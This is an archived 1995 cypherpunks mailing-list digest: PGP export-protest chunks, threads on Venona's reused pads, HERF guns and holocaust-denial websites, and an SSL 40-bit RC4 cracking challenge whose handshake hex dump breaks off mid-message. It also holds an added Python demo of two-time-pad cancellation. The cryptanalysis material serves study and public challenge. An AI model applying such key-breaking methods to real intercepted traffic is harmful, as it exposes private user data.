Hey! if I can do it, any clueful c'punk can do it!

Love Always,

Carol Anne

                            PGP.ZIP PART [017/713]
                                       
   This just cycles through: when part 713 is reached, part 0 will be
   recycled. We are on export 0 at the moment.
     _________________________________________________________________
   

------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael J. Axelrod" <mxa2677@usl.edu>
Date: Wed, 12 Jul 95 04:49:21 PDT
To: cypherpunks@toad.com
Subject: pgp.zip
Message-ID: <199507121148.AA16273@armagnac.ucs.usl.edu>
MIME-Version: 1.0
Content-Type: text/plain


So this is what it is like living on the edge ;-{

Warning: it may be illegal to use one of these as a sig file in the US
------------------ PGP.ZIP Part [019/713] -------------------
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
M=P1!C]JXUTH0KN`[',0'>!-C$8&.:`1/Y-,6[Z,-Y?O"`PK&X=$W*`,;L1HI
MF(JAZ(A:$/`XF)C!]4W(Q>?(Q!*\C0YHC!+R+4`>EB`>_7%/4`86X19NX!HN
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 12 Jul 95 03:58:40 PDT
To: cypherpunks@toad.com
Subject: Re: Num Rat
Message-ID: <v02120d0eac295a93d5c5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone know more of this program? Or care to summarize
>Benford's Law?

I can't wait to learn it. ;-).

One more bit of market efficiency for the regulatory arbitrage business.

I can see it now: an application of the "BabeWatch" idea to the 1040 form....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 12 Jul 95 19:01:26 PDT
To: cypherpunks@toad.com
Subject: AoHell
Message-ID: <v02120d0cac2993d9764c@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Does anybody know about where to get this? (If this was discussed
here during my cypherpunks-viewing hiatus, I apologize).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 12 Jul 95 05:09:46 PDT
To: danisch@ira.uka.de
Subject: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507111658.AA06104@elysion.iaks.ira.uka.de>
Message-ID: <199507121204.AA27373@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 11 Jul 1995 18:58:54 +0200
   From: danisch@ira.uka.de (Hadmut Danisch)
   X-Sun-Charset: US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   > I've never seen any actual nazism on the net anywhere, but this "strict 
   > regulation" tactic is obviously fascist in nature.


   There are certain nazi pages in America. They were showing them in
   a german tv magazine some time ago, but they didn't tell the URLs.
   The URL field in the Mosaic window was painted over.

   Hadmut



How do you know they weren't local?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 04:46:48 PDT
To: alt@iquest.net (Al Thompson)
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <m0sVs4F-000BYfC@dorite1.iquest.net>
Message-ID: <9507121146.AA10352@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain




And why, pray tell, did you repost this here?

Al Thompson writes:
> 
> >> From owner-roc@xmission.com Tue Jul 11 11:10:37 1995
> >> Date: Tue, 11 Jul 1995 13:45:37 -0400 (EDT)
> >> From: Ian Goddard <igoddard@CapAccess.org>
> >> To: Libernet@Dartmouth.edu
> >> 
> >
> >Header deleted for brevity
> >
> >> (please re-post)
> >>                
> >> 		 ATF SUMMER CAMP A HOTBED OF RACIAL HATE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 04:50:04 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Don't trust the net too much
In-Reply-To: <199507120328.XAA02985@bwh.harvard.edu>
Message-ID: <9507121149.AA10360@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	More specifically, few sensitive electronic items are
> hardened against electromagnetic pulses.  Ever see a speaker interfere
> with your TV set?

That's because electrons flying along long free paths in the vacuum of
your picture tube are easy to move off of path. However, I'll point
out that magnetic fields are always generated by dipoles and fall off
very fast with time. I'll also point out that you'd need a damn
powerful field to do the following:

> Build a big enough speaker, and you can screw with your computer's
> memory.

I'd have to hear very, very powerful evidence that this was possible,
especially at a distance.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 06:51:34 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121149.AA10360@snark.imsi.com>
Message-ID: <doug-9506121351.AA0053320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>
>Adam Shostack writes:
>> 	More specifically, few sensitive electronic items are
>> hardened against electromagnetic pulses.  Ever see a speaker interfere
>> with your TV set?
>
>That's because electrons flying along long free paths in the vacuum of
>your picture tube are easy to move off of path. However, I'll point
>out that magnetic fields are always generated by dipoles and fall off
>very fast with time. I'll also point out that you'd need a damn
>powerful field to do the following:
>
>> Build a big enough speaker, and you can screw with your computer's
>> memory.
>
>I'd have to hear very, very powerful evidence that this was possible,
>especially at a distance.
>
>Perry
>
>
>

For people interested in electromagnetic fields, TEMPEST, emanations,
crashing computers, and electronics eavesdropping:

Go see Winn Schwartau talk about HERF guns sometime. He passed around
a picture of a device for < US$500 that could crash any computer within
50 yards..  Then again, it isn't too good for the person firing the gun
either.. (mega EM emissions).

The parts are available if you know what to get. A VERY enlightening
and frightening presentation. I don't think he personally has built one.
His presentation contained a presentation on TEMPEST emissions, and
low level EM field effects on sensitive equipment problems too (a PBS
documentary - a VERY compelling presentation of why you should never
use walkman/CD players/radios/electronics equipment on airplanes if
they say not to, and you value your life)

Obviously, the further you get away, the faster the field decays, so
range to target is important. Then again, the US purportedly used a kind 
of HERF bomb against Iraqi telecommunications bunkers during the Persian
Gulf war. (No I don't have any references about this, but it shouldn't
be that hard to verify).

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 12 Jul 95 09:03:15 PDT
To: cypherpunks@toad.com
Subject: Rosenberg/VENONA: two time pads [Re: QED_jak]
In-Reply-To: <9507121445.AA10531@snark.imsi.com>
Message-ID: <199507121601.JAA20564@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@imsi.com> writes:

> The reports claimed the spies were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?

The AP story by Rita Beamish says:

   The Venona program translated 2,200 telegrams intercepted mostly from
   1942 to 1945.  They were double encoded with a complex numerical system
   that used a different random pattern for each message, officials said.
   The code would have been impossible to crack had not the volume of
   traffic resulted in the Soviets sloppily repeating some of the
   patterns, said Kahn.

The "repeating some of the patterns" means to me "two time pad".  Lots of
work in general, but doable, unlike the one time pad.

	Jim Gillogly
	Mersday, 19 Afterlithe S.R. 1995, 16:00
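
The cancellation behind "two time pad", as an added example that is not part of the original message. It assumes a model in which codebook groups are enciphered by digit-wise addition of pad groups without carry, and it assumes the codebook is known so that only the pad reuse is being shown; the codebook, messages and pad page are all constructed for illustration.

```python
# Constructed model of additive-pad reuse. The codebook, messages and pad
# page are invented for illustration; none of it is historical material.

CODEBOOK = {            # word -> 5-digit code group (constructed)
    "AGENT": "10472",
    "ARRIVES": "23915",
    "COURIER": "38064",
    "DELAYED": "41730",
    "MONDAY": "57281",
    "REPORT": "60359",
    "SENT": "74826",
    "TUESDAY": "89143",
}
DECODE = {group: word for word, group in CODEBOOK.items()}

PAD_PAGE = ["83190", "27465", "90513", "46728"]   # constructed; used twice
MSG1 = ["AGENT", "ARRIVES", "MONDAY"]
MSG2 = ["COURIER", "DELAYED", "TUESDAY"]


def add_mod10(a, b):
    """Digit-by-digit addition without carry."""
    return "".join(str((int(x) + int(y)) % 10) for x, y in zip(a, b))


def sub_mod10(a, b):
    """Digit-by-digit subtraction without borrow."""
    return "".join(str((int(x) - int(y)) % 10) for x, y in zip(a, b))


def encipher(words, pad):
    """Look each word up in the codebook, then add one pad group to it."""
    if len(pad) < len(words):
        raise ValueError("pad page shorter than message")
    return [add_mod10(CODEBOOK[w], k) for w, k in zip(words, pad)]


def strip_shared_pad(ct1, ct2):
    """(p1 + k) - (p2 + k) = p1 - p2, so a reused pad group cancels out."""
    return [sub_mod10(a, b) for a, b in zip(ct1, ct2)]


def drag_crib(diff, crib_word):
    """Suppose crib_word sits at each position of message 1 in turn.

    Returns, per position, the word message 2 would then contain, or None
    when the implied group is not in the codebook (the guess is rejected).
    """
    crib = CODEBOOK[crib_word]
    return [DECODE.get(sub_mod10(crib, d)) for d in diff]


def demo():
    ct1 = encipher(MSG1, PAD_PAGE)
    ct2 = encipher(MSG2, PAD_PAGE)      # same page again: the mistake
    diff = strip_shared_pad(ct1, ct2)   # no pad digits left in here
    return ct1, ct2, diff, drag_crib(diff, "AGENT")


if __name__ == "__main__":
    ct1, ct2, diff, hits = demo()
    print("ciphertext 1:", ct1)
    print("ciphertext 2:", ct2)
    print("difference  :", diff)
    print("crib AGENT  :", hits)
```

With a pad page used only once, the difference of two ciphertexts still contains the difference of two random pad groups, so no guess about one message can be checked against the other.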




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 12 Jul 95 06:32:41 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507121233.AA15475@elysion.iaks.ira.uka.de>
Message-ID: <199507121331.JAA05803@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| And the nazi pages were written in English. The pages were named
| after the author of the pages (something like 'The XY report', where
| XY was the author's name, but I can't remember it. The author was
| an American).

	The Leuter report?  Leuter was a local moron who claimed to be
an engineer.  He wrote a report claiming to prove that the gas
chambers somewhere were too small to kill many people.

	The Commonwealth of Mass brought him to court several years
ago for "practicing engineering without a license."  A good rebuttal
of his report was written up by (I think) William McVey, in Canada.
Ask in talk.politics.mideast, or soc.history.revisionist or something.

	I have no idea why this thread is still on cypherpunks, unless
it's an experiment in text stego.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Wed, 12 Jul 95 07:34:48 PDT
To: cypherpunks@toad.com
Subject: Re: pgp.zip
In-Reply-To: <199507121148.AA16273@armagnac.ucs.usl.edu>
Message-ID: <Pine.3.89.9507120958.C10643-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



Gee, this is not so difficult....


------------------ PGP.ZIP Part [020/713] -------------------
M=P1!C]JXUTH0KN`[',0'>!-C$8&.:`1/Y-,6[Z,-Y?O"`PK&X=$W*`,;L1HI
MF(JAZ(A:$/`XF)C!]4W(Q>?(Q!*\C0YHC!+R+4`>EB`>_7%/4`86X19NX!HN
MH0#G<19?81F68`&2D(!W$8/IF(IN$F5@)X0B!*W1`DW1"`;4PQ*I,E!MKPQT
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

   

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 12 Jul 95 06:53:47 PDT
To: cypherpunks@toad.com
Subject: QED_jak
Message-ID: <199507121353.JAA23961@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-12-95. NYPaper:


   "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
   Clues That Led to Code-Breaking."

      The American intelligence establishment today unveiled
      one of its oldest secrets: how a small team of
      codebreakers found the first clues that the Soviet Union
      sought to steal the blueprints for the atomic bomb in
      World War II.  Using just brain power -- no computers,
      no stolen skeleton keys -- the cryptographers slowly
      cracked what was thought to be an unbreakable code. 
      Their work and the fact that they had broken the
      Soviets' seemingly impenetrable cipher, was until today
      one of the most tightly held secrets of the National
      Security Agency, the nation's electronic eavesdropping
      service.  The messages were like a jigsaw puzzle with a
      billion pieces -- all black. They had been double-coded
      by a system called a one-time pad -- a unique random
      code for each message, converting words to numbers in a
      pattern used only once.                        HOO_doo


   [Book review] "What Would Happen if E.T. Actually Called:
   The implications of finding other intelligence in the
   universe." 

      Mr. Davies is a supporter of the program called SETI,
      the search for extraterrestrial intelligence, which aims
      radio telescopes at thousands of target star systems to
      try to detect communications from extraterrestrial
      civilizations. He argues that if we do pick up any
      signals, or even if we just determine that there is a
      single microorganism out there that formed independently
      of earthly contamination, this "would drastically alter
      our world view and change our society as profoundly as
      the Copernican and Darwinian revolutions." It would be,
      Mr. Davies writes, nothing less than "the greatest
      scientific discovery of all time."             ETT_eeg


   "AT&T Expected to Buy Stake In an Internet Access Provider"

      Cementing its recent link with one of the country's
      largest corporate Internet access providers, the AT&T
      Corporation will spend $8 million to buy a stake in the
      BBN Planet Corporation, according to an executive
      familiar with the company's plans.             BBN_bye



   3x Pad: QED_jak










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Wed, 12 Jul 95 08:04:24 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <199507121418.AA21899@bear-gate.bear.com>
Message-ID: <199507121455.JAA12032@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


> > 	The Leuter report?  Leuter was a local moron who claimed to be
> > an engineer.  He wrote a report claiming to prove that the gas
> > chambers somewhere were too small to kill many people.
> 
> For the record: It's Leuchter, Fred Leuchter.

There is a good accounting of Leuchter's work in "The Execution 
Protocol", an examination of Missouri's death penalty process.  I can 
get the ISBN number if anyone is interested.  It was also made into a 
documentary by Discovery.

Bryan



-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 08:00:17 PDT
To: perry@imsi.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121444.AA10523@snark.imsi.com>
Message-ID: <doug-9506121459.AA0062320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hmm.. I'm not sure I'd want to stand too close when one of those
things goes off, but it would be an interesting demo. :)

Maybe behind an EM shield.. ;) 
I think there was a question of some microelectronics being permanently
damaged because of fusion at the MOS level (burning through the gate), so
it might have to be a disposable machine in a place where no other machines
are near. It would depend on the magnitude of the charge (and hence cost
of the weapon). It might take a very expensive one to do this, or maybe
not...

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Wed, 12 Jul 95 07:19:09 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <199507121418.AA21899@bear-gate.bear.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> wrote:

> | And the nazi pages were written in English. The pages were named
> | after the author of the pages (something like 'The XY report', where
> | XY was the author's name, but I can't remember it. The author was
> | an American).
> 
> 	The Leuter report?  Leuter was a local moron who claimed to be
> an engineer.  He wrote a report claiming to prove that the gas
> chambers somewhere were too small to kill many people.

For the record: It's Leuchter, Fred Leuchter.
 
> 	The Commonwealth of Mass brought him to court several years
> ago for "practicing engineering without a license."  A good rebuttal
> of his report was written up by (I think) William McVey, in Canada.
> Ask in talk.politics.mideast, or soc.history.revisionist or something.

Ken McVay.  And dozens of other people too.  The newsgroup is
alt.revisionism.  If you've got any interest in the "holocaust
revisionism" phenomenon, it's well worth at least a brief look in
there.

Incidentally, I would say that this is one of the best uses of the
net I've ever seen.  This particular brand of neo-nazism is tricky:
in their case, it really is true that there's no such thing as bad
press.  Any exposure they get on TV, the radio, or in print media
helps their cause, because of the inherent limitations of those
media.  They can throw up smokescreens, spew out blatantly false
"facts" that sound plausible but can't be confirmed or denied then
and there, put on the "we're just skeptics who feel that these
questions need to be answered even though they're controversial" act,
etc.  Very difficult to counter, given the strict limitations on
time and resources of live broadcasts.

But on the net, where claims can be researched and repudiated and
responses "broadcast" almost immediately, and where people have all
the time in the world to debate these issues, these guys get
absolutely trounced every day.  They make a claim, it gets blown to
smithereens instantly by a dozen people with access to university
libraries and scanned photos, and the revisionists crawl away for a
while.  Then they come back a month later and start again.  It gets
kind of old after a while, but it's fascinating to see (especially for
those naive young people to whom the revisionists seem "reasonable").

Even for a part-time Luddite like me, this is an excellent
demonstration of how the net is in many ways fundamentally different
from traditional print and broadcast media.

> 	I have no idea why this thread is still on cypherpunks, unless
> it's an experiment in text stego.

Well, I hope my little digression above is at least slightly relevant.

   --Dave.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or 
agreement or any information about any transaction, customer account or account 
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 08:16:11 PDT
To: perry@imsi.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121505.AA10601@snark.imsi.com>
Message-ID: <doug-9506121515.AA0064320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>Doug Hughes writes:
>> 
>> Hmm.. I'm not sure I'd want to stand too close when one of those
>> things goes off, but it would be an interesting demo. :)
>> 
>> Maybe behind an EM shield.. ;) 
>
>What is it, exactly, that you imagine could happen to you? You realize
>that you can expose humans to pretty powerful electromagnetic fields
>without any noticeable effect unless the frequency happens to be one
>that their tissues absorb.
>
I'm thinking better safe than sorry. None of the studies on EM fields
and their effects on humans are causal, but a lot of studies and advice
have concluded that caution and minimization may be advisable.
 It's the un-noticeable effects that I'm worried about. ;)

>> I think there was a question of some microelectronics being permanently
>> damaged because of fusion at the MOS level (burning through the
>> gate),
>
>To do that requires that you transfer energy from your device into the
>computer you are attacking. How do you propose to do that?
>

Just relating what I thought I'd heard. It may be wrong, or I may be
remembering it wrong. My EM theory is a bit rusty.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 12 Jul 95 10:23:37 PDT
To: cypherpunks@toad.com
Subject: SSL RC4 challenge
Message-ID: <199507121722.KAA19834@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is a challenge to try breaking SSL using the default exportable
encryption mode, 40-bit RC4.  It consists of a record of a submission
of form data which was sent to Netscape's electronic shop order form in
"secure" mode.  However the data I entered in the form is not my real
name and address.  The challenge is to break the encryption and recover
the name and address info I entered in the form and sent securely to
Netscape.

(A URL for info on SSL is http://home.netscape.com/newsref/std/SSL.html.)

Below is the data which was sent back and forth, along with some
annotations to help interpret it.  The connection was made to
order.netscape.com at port 443, the https port.

The following is the first message from client to server, the
CLIENT-HELLO message.  It is not encrypted.

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0xaf 0x84
0xa7 0x79 0xf8 0x13 0x69 0x20 0x25 0x9b 0x53 0xa0 0x60 0xae 0x75 0x51 

This is interpreted as follows:

0x80 0x1c	Length field: 28 bytes follow in the packet.
0x01		MSG_CLIENT_HELLO
0x00 0x02	CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03	CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00	SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10	CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80	CIPHER-SPECS-DATA
<none>		SESSION-ID-DATA
0xaf...0x51	CHALLENGE-DATA [16 bytes]

The only cipher spec sent (and hence supported) by the browser is
0x02 0x00 0x80, which is SSL_CK_RC4_128_EXPORT40_WITH_MD5.  No session id
is sent, hence new key information will be calculated for this session.
And 16 bytes of challenge data are sent in the clear; this will be useful
as known plaintext returned encrypted by the server later.

The following data is then returned by the server, in the SERVER-HELLO
message:

0x82 0x2b 0x04 0x00 0x01 0x00 0x02 0x02 0x0d 0x00 0x03 0x00 0x10 0x30 0x82 0x02
0x09 0x30 0x82 0x01 0x72 0x02 0x02 0x00 0x88 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x32 0x32 0x34 0x30 0x31 0x30 0x39 0x32
0x34 0x5a 0x17 0x0d 0x39 0x37 0x30 0x32 0x32 0x33 0x30 0x31 0x30 0x39 0x32 0x34
0x5a 0x30 0x81 0x97 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55
0x53 0x31 0x13 0x30 0x11 0x06 0x03 0x55 0x04 0x08 0x13 0x0a 0x43 0x61 0x6c 0x69
0x66 0x6f 0x72 0x6e 0x69 0x61 0x31 0x16 0x30 0x14 0x06 0x03 0x55 0x04 0x07 0x13
0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e 0x20 0x56 0x69 0x65 0x77 0x31 0x2c
0x30 0x2a 0x06 0x03 0x55 0x04 0x0a 0x13 0x23 0x4e 0x65 0x74 0x73 0x63 0x61 0x70
0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73
0x20 0x43 0x6f 0x72 0x70 0x6f 0x72 0x61 0x74 0x69 0x6f 0x6e 0x31 0x16 0x30 0x14
0x06 0x03 0x55 0x04 0x0b 0x13 0x0d 0x4f 0x6e 0x6c 0x69 0x6e 0x65 0x20 0x4f 0x72
0x64 0x65 0x72 0x73 0x31 0x15 0x30 0x13 0x06 0x03 0x55 0x04 0x03 0x13 0x0c 0x41
0x72 0x69 0x20 0x4c 0x75 0x6f 0x74 0x6f 0x6e 0x65 0x6e 0x30 0x5a 0x30 0x0d 0x06
0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x01 0x05 0x00 0x03 0x49 0x00 0x30
0x46 0x02 0x41 0x00 0xa5 0xa7 0x7b 0x42 0xb1 0x79 0x2d 0x0b 0x35 0x08 0xb4 0x0d
0x74 0x1d 0x46 0x6a 0x29 0x07 0x47 0x08 0xdc 0x3a 0x76 0x36 0xbd 0x7f 0xb3 0xd4
0xa9 0x85 0x9d 0x4b 0x65 0x74 0xc1 0x00 0x56 0xec 0x5a 0x31 0x72 0x23 0x04 0xc1
0xcf 0x78 0x63 0x21 0x77 0x69 0xd9 0xf0 0x61 0xc8 0x73 0xf7 0xdc 0x4c 0xde 0xd2
0x22 0x99 0x79 0xdf 0x02 0x01 0x03 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7
0x0d 0x01 0x01 0x04 0x05 0x00 0x03 0x81 0x81 0x00 0x7e 0x4a 0x28 0x7d 0xba 0xfa
0x41 0x5a 0x19 0x1c 0x9a 0xea 0x6d 0x3b 0x07 0x1c 0x97 0xe0 0xf5 0xf8 0x4c 0xd5
0x92 0x0c 0x1c 0x30 0x49 0x06 0x72 0x42 0x9a 0x3f 0xfc 0x3b 0x11 0x17 0x78 0x7e
0x6c 0x27 0x8a 0x12 0x19 0xf3 0x08 0x18 0x6e 0xe0 0xc3 0xbe 0xe7 0x37 0xbd 0x4e
0xae 0xe1 0x9e 0x4a 0x3b 0xa9 0xbf 0xc0 0x92 0x59 0x2c 0xdb 0x37 0x34 0xc8 0xa0
0xc0 0xba 0xb8 0x6f 0xd3 0xd6 0xc7 0x48 0x88 0xbc 0xd6 0xff 0x7a 0xf7 0x76 0x70
0x2c 0x19 0x07 0xc8 0x7c 0x80 0x29 0x18 0x58 0xfc 0xd1 0x12 0x86 0x99 0x4e 0x32
0xee 0xb9 0xf5 0x11 0x70 0xd5 0x1b 0xf7 0x85 0x5b 0x4a 0x0e 0xd6 0xe6 0x6c 0x52
0xf5 0x8a 0x2c 0x97 0x3e 0x63 0x85 0x57 0x43 0xbc 0x02 0x00 0x80 0xbf 0xeb 0x90
0xf8 0x2c 0x0c 0xe1 0xea 0x18 0xac 0x11 0x4c 0x83 0x14 0x21 0xb6 

This is interpreted as follows:

0x82 0x2b	Packet length, 555 bytes follow.
0x04		MSG-SERVER-HELLO
0x00		SESSION-ID-HIT
0x01		CERTIFICATE-TYPE
0x00 0x02	SERVER-VERSION-MSB SERVER-VERSION-LSB
0x02 0x0d	CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03	CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10	CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0xbc	CERTIFICATE-DATA [525 bytes]
0x02 0x00 0x80	CIPHER-SPECS-DATA
0xbf...0xb6	CONNECTION-ID-DATA [16 bytes]

Most of the packet is the certificate.  SESSION-ID-HIT is 0 since no
session ID was sent by the client.  After the 525 (0x020d) bytes of
certificate comes the 3 byte code for 40 bit RC4, then the 16 byte
connection ID.  The main importance of the connection ID data here
is that it helps to calculate the session keys as described below.

The next message, from the client to the server, is the CLIENT-MASTER-KEY
sent mostly in the clear:

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0x0e 0x89 0x94 0xb8
0xbf 0x0e 0xb9 0x2e 0x50 0x44 0x07 0x8c 0x52 0xeb 0xef 0x44 0xc1 0x01 0x4b 0xc1
0x02 0xd2 0x2e 0x37 0x1f 0x1d 0x54 0xc2 0x83 0x45 0x79 0x6b 0xc8 0xe3 0x85 0x17
0xb8 0xd4 0x84 0xc6 0x9f 0xb1 0x6a 0x03 0x2e 0x97 0xae 0x82 0x75 0x10 0xf0 0x7b
0x5f 0x25 0x7b 0x88 0x75 0xc6 0x7a 0x33 0x5f 0xd6 0x96 0x99 0x94 0xd0 0x7a 0x78
